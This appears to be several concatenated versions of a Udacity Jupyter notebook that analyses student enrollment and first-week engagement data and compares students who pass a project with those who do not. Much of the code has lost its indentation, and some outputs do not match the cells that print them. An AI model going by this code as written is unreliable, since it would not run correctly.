## days each student visits the classroom during the first week.
for engagement_record in paid_engagement:
if engagement_record['num_courses_visited'] > 0:
engagement_record['has_visited'] = 1
else:
engagement_record['has_visited'] = 0
days_visited_by_account = sum_grouped_items(engagement_by_account,
'has_visited')
describe_data(days_visited_by_account.values())
###Output
Mean: 2.86733668342
Standard deviation: 2.25519800292
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
pass_subway_project = set()
for submission in paid_submission:
project = submission['lesson_key']
rating = submission['assigned_rating']
if ((project in subway_project_lesson_keys) and (rating == 'PASSED' or rating == 'DISTINCTION')):
pass_subway_project.add(submission['account_key'])
len(pass_subway_project)
passing_engagement = []
non_passing_engagement = []
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] in pass_subway_project:
passing_engagement.append(engagement_record)
else:
non_passing_engagement.append(engagement_record)
print len(passing_engagement)
print len(non_passing_engagement)
###Output
4527
2392
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
passing_engagement_by_account = group_data(passing_engagement, 'account_key')
non_passing_engagement_by_account = group_data(non_passing_engagement, 'account_key')
print 'non-passing students:'
non_passing_minutes = sum_grouped_items(non_passing_engagement_by_account, 'total_minutes_visited')
describe_data(non_passing_minutes.values())
print 'passing students:'
passing_minutes = sum_grouped_items(passing_engagement_by_account, 'total_minutes_visited')
describe_data(passing_minutes.values())
print 'non-passing students:'
non_passing_lessons = sum_grouped_items(non_passing_engagement_by_account, 'lessons_completed')
describe_data(non_passing_lessons.values())
print 'passing students:'
passing_lessons = sum_grouped_items(passing_engagement_by_account, 'lessons_completed')
describe_data(passing_lessons.values())
print 'non-passing students:'
non_passing_visits = sum_grouped_items(non_passing_engagement_by_account, 'has_visited')
describe_data(non_passing_visits.values())
print 'passing students:'
passing_visits = sum_grouped_items(passing_engagement_by_account, 'has_visited')
describe_data(passing_visits.values())
###Output
non-passing students:
Mean: 143.326474267
Standard deviation: 269.538619011
Minimum: 0.0
Maximum: 1768.52274933
passing students:
Mean: 394.586046484
Standard deviation: 448.499519327
Minimum: 0.0
Maximum: 3564.7332645
non-passing students:
Mean: 0.862068965517
Standard deviation: 2.54915994183
Minimum: 0
Maximum: 27
passing students:
Mean: 2.05255023184
Standard deviation: 3.14222705558
Minimum: 0
Maximum: 36
non-passing students:
Mean: 1.90517241379
Standard deviation: 1.90573144136
Minimum: 0
Maximum: 7
passing students:
Mean: 3.38485316847
Standard deviation: 2.25882147092
Minimum: 0
Maximum: 7
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
non_passing_minutes = sum_grouped_items(non_passing_engagement_by_account, 'total_minutes_visited')
passing_minutes = sum_grouped_items(passing_engagement_by_account, 'total_minutes_visited')
describe_data(non_passing_minutes.values())
describe_data(passing_minutes.values())
plt.hist(passing_minutes.values())
plt.hist(non_passing_minutes.values())
passing_lessons = sum_grouped_items(passing_engagement_by_account, 'lessons_completed')
non_passing_lessons = sum_grouped_items(non_passing_engagement_by_account, 'lessons_completed')
describe_data(passing_lessons.values())
describe_data(non_passing_lessons.values())
plt.hist(passing_lessons.values())
plt.hist(non_passing_lessons.values())
non_passing_visits = sum_grouped_items(non_passing_engagement_by_account, 'has_visited')
passing_visits = sum_grouped_items(passing_engagement_by_account, 'has_visited')
describe_data(non_passing_visits.values())
describe_data(passing_visits.values())
plt.hist(passing_visits.values())
plt.hist(non_passing_visits.values())
###Output
Mean: 1.90517241379
Standard deviation: 1.90573144136
Minimum: 0
Maximum: 7
Mean: 3.38485316847
Standard deviation: 2.25882147092
Minimum: 0
Maximum: 7
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
import seaborn as sns
plt.hist(non_passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week for students who do not pass the subway project')
plt.show()
plt.hist(passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week for students who pass the subway project')
plt.show()
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:

- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.
- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.
- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage.

Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
with open('data/enrollments.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
enrollments = list(reader)
enrollments[0]
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
def read_csv(filename):
    with open(filename, 'rb') as f:
        reader = unicodecsv.DictReader(f)
        return list(reader)
daily_engagement = read_csv('data/daily_engagement.csv')
project_submissions = read_csv('data/project_submissions.csv')
print daily_engagement[0]
print project_submissions[0]
###Output
{u'lessons_completed': u'0.0', u'num_courses_visited': u'1.0', u'total_minutes_visited': u'11.6793745', u'projects_completed': u'0.0', u'acct': u'0', u'utc_date': u'2015-01-09'}
{u'lesson_key': u'3176718735', u'processing_state': u'EVALUATED', u'account_key': u'256', u'assigned_rating': u'UNGRADED', u'completion_date': u'2015-01-16', u'creation_date': u'2015-01-14'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
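###Markdown
A minimal re-run-safe sketch (not part of the original exercise, and reusing the `parse_date` helper and `dt` alias defined above): only parse values that are still strings, so running the clean-up again does not raise.
```python
# Re-parse a field only if it has not been converted yet, so re-running the cell is harmless.
for enrollment in enrollments:
    if enrollment['join_date'] is not None and not isinstance(enrollment['join_date'], dt):
        enrollment['join_date'] = parse_date(enrollment['join_date'])
```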
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur.

Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
enrollment_num_rows = len(enrollments)
student_list = [i['account_key'] for i in enrollments]
enrollment_num_unique_students = len(set(student_list))
print enrollment_num_rows
print enrollment_num_unique_students
engagement_num_rows = len(daily_engagement)
student_list = [i['acct'] for i in daily_engagement]
engagement_num_unique_students = len(set(student_list))
print engagement_num_rows
print engagement_num_unique_students
submission_num_rows = len(project_submissions)
student_list = [i['account_key'] for i in project_submissions]
submission_num_unique_students = len(set(student_list))
print submission_num_rows
print submission_num_unique_students
###Output
3642
743
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
for i in daily_engagement:
i['account_key'] = i['acct']
del i['acct']
daily_engagement[0]['account_key']
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
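## A possible sketch (the exercise leaves the approach open): collect the account
## keys present in the engagement table and show the first enrollment without any.
engagement_account_keys = set(record['account_key'] for record in daily_engagement)
for enrollment in enrollments:
    if enrollment['account_key'] not in engagement_account_keys:
        print enrollment
        break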
###Output
_____no_output_____
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
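## A possible sketch: count the enrollments still missing from the engagement table
## once same-day cancellations are excluded (reuses engagement_account_keys from the
## sketch in the previous cell).
num_problem_students = 0
for enrollment in enrollments:
    if (enrollment['account_key'] not in engagement_account_keys
            and enrollment['join_date'] != enrollment['cancel_date']):
        num_problem_students += 1
print num_problem_students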
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment in non_udacity_enrollments:
    if not enrollment['is_canceled'] or enrollment['days_to_cancel'] > 7:
        account_key = enrollment['account_key']
        join_date = enrollment['join_date']
        # keep the most recent join date for students who enrolled more than once
        if account_key not in paid_students or join_date > paid_students[account_key]:
            paid_students[account_key] = join_date
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week = []
for engagement_record in non_udacity_engagement:
    account_key = engagement_record['account_key']
    if (account_key in paid_students and
            within_one_week(paid_students[account_key], engagement_record['utc_date'])):
        paid_engagement_in_first_week.append(engagement_record)
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = total_minutes_by_account.values()
print 'Mean:', np.mean(total_minutes)
print 'Standard deviation:', np.std(total_minutes)
print 'Minimum:', np.min(total_minutes)
print 'Maximum:', np.max(total_minutes)
###Output
_____no_output_____
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
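## A possible sketch: inspect the student who spent the most minutes in the first
## week and print all of that student's engagement records.
max_minutes = max(total_minutes_by_account.values())
for account_key, minutes in total_minutes_by_account.items():
    if minutes == max_minutes:
        for record in engagement_by_account[account_key]:
            print record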
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
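## A possible sketch, reusing engagement_by_account from the cell above.
def sum_engagement_field(grouped_engagement, field_name):
    totals = {}
    for account_key, records in grouped_engagement.items():
        totals[account_key] = sum(record[field_name] for record in records)
    return totals
lessons_completed_by_account = sum_engagement_field(engagement_by_account, 'lessons_completed')
lessons_completed = lessons_completed_by_account.values()
print 'Mean:', np.mean(lessons_completed)
print 'Standard deviation:', np.std(lessons_completed)
print 'Minimum:', np.min(lessons_completed)
print 'Maximum:', np.max(lessons_completed)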
###Output
_____no_output_____
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
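## A possible sketch: flag days with at least one course visit, then reuse the
## helper from the previous sketch to count those days per student.
for engagement_record in paid_engagement_in_first_week:
    engagement_record['has_visited'] = 1 if engagement_record['num_courses_visited'] > 0 else 0
days_visited_by_account = sum_engagement_field(engagement_by_account, 'has_visited')
days_visited = days_visited_by_account.values()
print 'Mean:', np.mean(days_visited)
print 'Standard deviation:', np.std(days_visited)
print 'Minimum:', np.min(days_visited)
print 'Maximum:', np.max(days_visited)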
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
pass_subway_project = set()
for submission in non_udacity_submissions:
    if (submission['lesson_key'] in subway_project_lesson_keys and
            submission['assigned_rating'] in ('PASSED', 'DISTINCTION')):
        pass_subway_project.add(submission['account_key'])
passing_engagement = [record for record in paid_engagement_in_first_week
                      if record['account_key'] in pass_subway_project]
non_passing_engagement = [record for record in paid_engagement_in_first_week
                          if record['account_key'] not in pass_subway_project]
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
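## A possible sketch: group each list by account and compare the average minutes
## spent in the classroom, reusing sum_engagement_field from an earlier sketch.
def group_by_account(engagement_list):
    grouped = defaultdict(list)
    for record in engagement_list:
        grouped[record['account_key']].append(record)
    return grouped
passing_by_account = group_by_account(passing_engagement)
non_passing_by_account = group_by_account(non_passing_engagement)
passing_minutes = sum_engagement_field(passing_by_account, 'total_minutes_visited').values()
non_passing_minutes = sum_engagement_field(non_passing_by_account, 'total_minutes_visited').values()
print 'Passing students, mean minutes:', np.mean(passing_minutes)
print 'Non-passing students, mean minutes:', np.mean(non_passing_minutes)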
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
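## A possible sketch: histograms of first-week minutes for both groups, reusing
## passing_minutes and non_passing_minutes from the previous sketch.
import matplotlib.pyplot as plt
plt.hist(passing_minutes)
plt.title('Minutes in the first week - passing students')
plt.show()
plt.hist(non_passing_minutes)
plt.title('Minutes in the first week - non-passing students')
plt.show()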
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:

- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.
- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.
- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage.

Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
with open('enrollments.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
enrollments = list(reader)
enrollments[0]
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
with open('daily_engagement.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
daily_engagement = list(reader)
daily_engagement[0]
with open('project_submissions.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
project_submissions = list(reader)
project_submissions[0]
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None.
# This date parser assumes month/day/year format.
def parse_date_mdy(date):
    if date == '':
        return None
    else:
        return dt.strptime(date, '%m/%d/%Y')
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None.
# This date parser assumes year-month-day format.
def parse_date_ymd(date):
    if date == '':
        return None
    else:
        return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date_mdy(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'TRUE'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'TRUE'
enrollment['join_date'] = parse_date_mdy(enrollment['join_date'])
enrollments[0]
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del engagement_record['acct']
daily_engagement[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date_mdy(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date_ymd(submission['completion_date'])
submission['creation_date'] = parse_date_ymd(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur.

Investigating the Data
###Code
def get_unique_students(data):
unique_students = set()
for data_point in data:
unique_students.add(data_point['account_key'])
return unique_students
unique_enrollments = get_unique_students(enrollments)
print(len(unique_enrollments))
print(len(enrollments))
unique_daily_engagement = get_unique_students(daily_engagement)
print(len(unique_daily_engagement))
print(len(daily_engagement))
unique_submission = get_unique_students(project_submissions)
print(len(unique_submission))
print(len(project_submissions))
###Output
1302
1640
1237
136240
743
3642
###Markdown
Problems in the Data

Missing Engagement Records
###Code
## Find any student enrollment(s) where the student is missing from the daily engagement table.
for enrollment in enrollments:
student = enrollment['account_key']
if student not in unique_daily_engagement and enrollment['join_date'] != enrollment['cancel_date']:
print(student)
#These output accounts are all udacity test accounts.
###Output
1304
1304
1101
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
udacity_test_accounts
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
# Flag each engagement record with whether the student visited at least one course that day.
# (Note: paid_engagement is only built in the "Getting Data from First Week" section below, so run that cell first.)
for engagement_record in paid_engagement:
if engagement_record['num_courses_visited'] > 0:
engagement_record['has_visited'] = 1
else:
engagement_record['has_visited'] = 0
###Output
_____no_output_____
###Markdown
Refining the Question
###Code
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days (first 7 days are free in udacity). The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment in non_udacity_enrollments:
if not enrollment['is_canceled'] or enrollment['days_to_cancel'] > 7:
account_key = enrollment['account_key']
enrollment_date = enrollment['join_date']
# Since a student can enroll multiple times, we need to store the latest enrollment date for students
        if account_key not in paid_students or enrollment_date > paid_students[account_key]:
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >= 0
""" Create a list of rows from the engagement table including only rows where
the student is one of the paid students you just found, and the date is within
one week of the student's join date.
"""
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
paid_enrollments = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submissions = remove_free_trial_cancels(non_udacity_submissions)
print(len(paid_enrollments))
print(len(paid_engagement))
print(len(paid_submissions))
paid_engagement_in_first_week = []
for engagement_record in paid_engagement:
account_key = engagement_record['account_key']
join_date = paid_students[account_key]
engagement_record_date = engagement_record['utc_date']
    if within_one_week(join_date, engagement_record_date):  # this was the problem spot while debugging; the other lists already had the correct lengths
paid_engagement_in_first_week.append(engagement_record)
len(paid_engagement_in_first_week)
###Output
1293
134549
3618
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
import numpy as np
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
# In python3, dict.values returns a dict_values object, which is not a list or tuple. Try coercing that into a list.
total_minutes = list(total_minutes_by_account.values())
print('Mean:', np.mean(total_minutes))
print('Standard deviation:', np.std(total_minutes))
print('Minimum:', np.min(total_minutes))
print('Maximum:', np.max(total_minutes))
###Output
Mean: 325.7850653949317
Standard deviation: 418.40526409921097
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_mintutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_mintutes = student # student's account_key with maximum minutes stored
# print(max_minutes)
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] == student_with_max_mintutes:
print(engagement_record)
###Output
OrderedDict([('utc_date', datetime.datetime(2015, 7, 9, 0, 0)), ('num_courses_visited', 4), ('total_minutes_visited', 850.5193397), ('lessons_completed', 4), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 10, 0, 0)), ('num_courses_visited', 6), ('total_minutes_visited', 872.6339233), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 11, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 777.0189037), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 12, 0, 0)), ('num_courses_visited', 1), ('total_minutes_visited', 294.568774), ('lessons_completed', 2), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 13, 0, 0)), ('num_courses_visited', 3), ('total_minutes_visited', 471.2139785), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 14, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 298.7783453), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 15, 0, 0)), ('num_courses_visited', 0), ('total_minutes_visited', 0.0), ('lessons_completed', 0), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 0)])
###Markdown
Lessons Completed in First Week
###Code
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
lessons_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
lessons_by_account[account_key].append(engagement_record)
# Create a dictionary with the total lessons each student completed during the first week.
# The keys are account keys, and the values are numbers (total lessons completed)
completed_lessons_by_account = {}
for account_key, engagement_for_student in lessons_by_account.items():
total_lessons = 0
for engagement_record in engagement_for_student:
total_lessons += engagement_record['lessons_completed']
completed_lessons_by_account[account_key] = total_lessons
# In python3, dict.values returns a dict_values object, which is not a list or tuple. Try coercing that into a list.
total_lessons = list(completed_lessons_by_account.values())
print('Mean:', np.mean(total_lessons))
print('Standard deviation:', np.std(total_lessons))
print('Minimum:', np.min(total_lessons))
print('Maximum:', np.max(total_lessons))
###Output
Mean: 1.6904522613065327
Standard deviation: 3.0286171606877743
Minimum: 0
Maximum: 36
###Markdown
The two blocks above, rewritten using reusable helper functions
###Code
# import numpy as np
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
engagement_by_account = group_data(paid_engagement_in_first_week, 'account_key')
# engagement_by_account
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_account = sum_grouped_items(engagement_by_account, 'total_minutes_visited')
# total_minutes_by_account
def described_data(data, header):  # header is the title to print above these statistics
    updated_data = list(data.values())
    print(header)
    print('Mean:', np.mean(updated_data))
    print('Standard deviation:', np.std(updated_data))
    print('Minimum:', np.min(updated_data))
    print('Maximum:', np.max(updated_data))
described_data(total_minutes_by_account, 'TOTAL MINUTES :')
###Output
TOTAL MINUTES :
Mean: 325.7850653949317
Standard deviation: 418.40526409921097
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Number of Visits in First Week
###Code
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
days_by_account = group_data(paid_engagement_in_first_week, 'account_key')
# days_by_account
"""
This is that first part solution for which we need to change the sum_grouped_items function.
This function will only return statistics on "number_of_courses" visited.
It does NOT tell about the number of days visited.
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
if data_point['num_courses_visited'] > 0:
total += data_point[field_name]
summed_data[key] = total
return summed_data
"""
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
days_visited_by_account = sum_grouped_items(engagement_by_account, 'has_visited')
# days_visited_by_account
def described_data(data, header = '' ): # header is the title we need to give this statistics with default as None
updated_data = list(data.values())
print(header)
print('Mean:', np.mean(updated_data))
print('Standard deviation:', np.std(updated_data))
print('Minimum:', np.min(updated_data))
print('Maximum:', np.max(updated_data))
described_data(days_visited_by_account, 'Days Visited in the First Week')
###Output
Days Visited in the First Week
Mean: 3.0422110552763817
Standard deviation: 2.2300431831405754
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
pass_subway_project = set()
